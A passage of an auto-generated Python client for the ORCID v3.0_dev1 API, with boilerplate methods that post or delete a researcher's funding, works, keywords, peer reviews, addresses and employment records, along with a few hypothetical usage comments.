"Got an unexpected keyword argument '%s'"
" to method create_funding_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_funding_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_group_id_record_json(self, **kwargs):
"""
Create a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_id_record_json(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_id_record_json_with_http_info(**kwargs)
else:
(data) = self.create_group_id_record_json_with_http_info(**kwargs)
return data
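    # Note: group-id records are not tied to a specific ORCID iD, so this
    # endpoint takes only the body. Hypothetical sketch:
    #
    #   record = GroupIdRecord(...)  # hypothetical payload
    #   api.create_group_id_record_json(body=record)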
def create_group_id_record_json_with_http_info(self, **kwargs):
"""
Create a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_id_record_json_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_id_record_json" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_keyword_json(self, orcid, **kwargs):
"""
Add keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_keyword_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_keyword_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_keyword_json_with_http_info(orcid, **kwargs)
return data
def create_keyword_json_with_http_info(self, orcid, **kwargs):
"""
Add keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_keyword_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_keyword_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_keyword_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_other_name_json(self, orcid, **kwargs):
"""
Add other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_other_name_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_other_name_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_other_name_json_with_http_info(orcid, **kwargs)
return data
def create_other_name_json_with_http_info(self, orcid, **kwargs):
"""
Add other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_other_name_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_other_name_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_other_name_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_peer_review_json(self, orcid, **kwargs):
"""
Create a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_peer_review_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PeerReview body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_peer_review_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_peer_review_json_with_http_info(orcid, **kwargs)
return data
def create_peer_review_json_with_http_info(self, orcid, **kwargs):
"""
Create a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_peer_review_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PeerReview body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_peer_review_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_peer_review_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_researcher_url_json(self, orcid, **kwargs):
"""
        Add a new researcher URL for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_researcher_url_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_researcher_url_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_researcher_url_json_with_http_info(orcid, **kwargs)
return data
def create_researcher_url_json_with_http_info(self, orcid, **kwargs):
"""
        Add a new researcher URL for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_researcher_url_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_researcher_url_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_researcher_url_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_work_json(self, orcid, **kwargs):
"""
Create a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_work_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Work body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_work_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_work_json_with_http_info(orcid, **kwargs)
return data
def create_work_json_with_http_info(self, orcid, **kwargs):
"""
Create a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_work_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Work body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_work_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_work_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_works(self, orcid, **kwargs):
"""
        Create a list of Works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_works(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param WorkBulk body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_works_with_http_info(orcid, **kwargs)
else:
(data) = self.create_works_with_http_info(orcid, **kwargs)
return data
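    # Bulk sketch (hypothetical): a `WorkBulk` payload posts several works in
    # one request to /{orcid}/works, avoiding one create_work_json round trip
    # per work.
    #
    #   bulk = WorkBulk(...)  # hypothetical payload of multiple works
    #   result = api.create_works(orcid, body=bulk)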
def create_works_with_http_info(self, orcid, **kwargs):
"""
        Create a list of Works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_works_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param WorkBulk body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_address(self, orcid, put_code, **kwargs):
"""
Delete an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_address(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_address_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_address_with_http_info(orcid, put_code, **kwargs)
return data
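    # Delete sketch (hypothetical put-code): items are deleted by the
    # put-code assigned to them at creation time.
    #
    #   api.delete_address('0000-0002-1825-0097', '12345')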
def delete_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_address_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_education(self, orcid, put_code, **kwargs):
"""
Delete an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_education(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_education_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_education_with_http_info(orcid, put_code, **kwargs)
return data
def delete_education_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_education_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_education" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_education`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_education`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_employment(self, orcid, put_code, **kwargs):
"""
Delete an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_employment(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_employment_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_employment_with_http_info(orcid, put_code, **kwargs)
return data
def delete_employment_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_employment_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_employment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_employment`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_employment`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_external_identifier(self, orcid, put_code, **kwargs):
"""
Delete external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_external_identifier(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_external_identifier_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_external_identifier_with_http_info(orcid, put_code, **kwargs)
return data
def delete_external_identifier_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_external_identifier_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_external_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_external_identifier`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_external_identifier`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
